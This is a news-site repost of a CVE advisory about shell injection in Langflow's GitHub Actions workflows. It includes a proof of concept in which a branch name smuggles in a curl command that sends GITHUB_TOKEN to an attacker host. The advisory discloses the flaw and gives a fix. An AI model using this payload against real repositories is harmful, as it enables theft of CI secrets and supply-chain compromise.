Close Menu

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Wildlife Cops Are Searching AI Cameras for ICE

    April 8, 2026

    SSA-734261 V1.0: Authentication Bypass Vulnerability in Energy Services Using Elspec G5DFR

    April 8, 2026

    Incident: Eagers Automotive says IT outage stems from cyber incident | iTnews

    April 8, 2026
    Facebook X (Twitter) Instagram
    • Demos
    • Technology
    • Gaming
    • Buy Now
    Facebook X (Twitter) Instagram Pinterest Vimeo
    Canadian Cyber WatchCanadian Cyber Watch
    • Home
    • News
    • Alerts
    • Tips
    • Tools
    • Industry
    • Incidents
    • Events
    • Education
    Subscribe
    Canadian Cyber WatchCanadian Cyber Watch
    Home»Alerts»CVE-2026-33475 | THREATINT
    Alerts

    CVE-2026-33475 | THREATINT

    adminBy adminMarch 24, 2026No Comments2 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Home

    Description

    Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. — ### Details Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as: “`yaml run: | validate_branch_name “${{ github.event.pull_request.head.ref }}” “` Or: “`yaml run: npx playwright install ${{ inputs.browsers }} –with-deps “` Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection. — ### PoC 1. **Fork** the Langflow repository 2. **Create a new branch** with the name: “`bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN “` 3. **Open a Pull Request** to the main branch from the new branch 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`) 5. The `run:` step containing: “`yaml echo “Branch: ${{ github.head_ref }}” “` Will execute: “`bash echo “Branch: injection-test” curl https://attacker.site/exfil?token=$GITHUB_TOKEN “` 6. The attacker receives the CI secret via the exfil URL. — ### Impact – **Type:** Shell Injection / Remote Code Execution in CI – **Scope:** Any public Langflow fork with GitHub Actions enabled – **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data — ### Suggested Fix Refactor affected workflows to **use environment variables** and wrap them in **double quotes**: “`yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo “Branch is: \”$BRANCH_NAME\”” “` Avoid direct `${{ … }}` interpolation inside `run:` for any user-controlled value. — ### Affected Files (Langflow `1.3.4`) – `.github/actions/install-playwright/action.yml` – `.github/workflows/deploy-docs-draft.yml` – `.github/workflows/docker-build.yml` – `.github/workflows/release_nightly.yml` – `.github/workflows/python_test.yml` – `.github/workflows/typescript_test.yml`

    PUBLISHED Reserved 2026-03-20 | Published 2026-03-24 | Updated 2026-03-24 | Assigner GitHub_M

    CRITICAL: 9.1CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

    Problem types

    CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)

    CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

    Product status

    < 1.9.0
    affected

    References

    github.com/…ngflow/security/advisories/GHSA-87cc-65ph-2j4w

    cve.org (CVE-2026-33475)

    nvd.nist.gov (CVE-2026-33475)

    Download JSON



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleDebian DSA-6176-1 strongSwan Critical DoS Integer Underflow
    Next Article NSIRA Complaint Forms – National Security and Intelligence Review Agency
    admin
    • Website

    Related Posts

    Alerts

    SSA-734261 V1.0: Authentication Bypass Vulnerability in Energy Services Using Elspec G5DFR

    April 8, 2026
    Alerts

    Incident: Eagers Automotive says IT outage stems from cyber incident | iTnews

    April 8, 2026
    Alerts

    CISA Adds One Known Exploited Vulnerability to Catalog

    April 8, 2026
    Add A Comment

    Comments are closed.

    Demo
    Top Posts

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views

    Catchy & Intriguing

    March 17, 202619 Views

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202617 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews
    85
    Featured

    Pico 4 Review: Should You Actually Buy One Instead Of Quest 2?

    January 15, 2021 Featured
    8.1
    Uncategorized

    A Review of the Venus Optics Argus 18mm f/0.95 MFT APO Lens

    January 15, 2021 Uncategorized
    8.9
    Editor's Picks

    DJI Avata Review: Immersive FPV Flying For Drone Enthusiasts

    January 15, 2021 Editor's Picks

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Demo
    Most Popular

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views

    Catchy & Intriguing

    March 17, 202619 Views

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202617 Views
    Our Picks

    Wildlife Cops Are Searching AI Cameras for ICE

    April 8, 2026

    SSA-734261 V1.0: Authentication Bypass Vulnerability in Energy Services Using Elspec G5DFR

    April 8, 2026

    Incident: Eagers Automotive says IT outage stems from cyber incident | iTnews

    April 8, 2026

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2026 ThemeSphere. Designed by ThemeSphere.

    Type above and press Enter to search. Press Esc to cancel.